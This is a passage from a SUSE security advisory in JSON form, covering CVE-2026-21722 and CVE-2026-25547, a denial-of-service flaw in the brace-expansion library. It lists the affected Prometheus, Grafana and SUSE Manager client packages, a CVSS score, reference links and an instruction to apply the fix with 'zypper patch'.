"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "moderate"
}
],
"title": "CVE-2026-21722"
},
{
"cve": "CVE-2026-25547",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-25547"
}
],
"notes": [
{
"category": "general",
"text": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-25547",
"url": "https://www.suse.com/security/cve/CVE-2026-25547"
},
{
"category": "external",
"summary": "SUSE Bug 1257834 for CVE-2026-25547",
"url": "https://bugzilla.suse.com/1257834"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
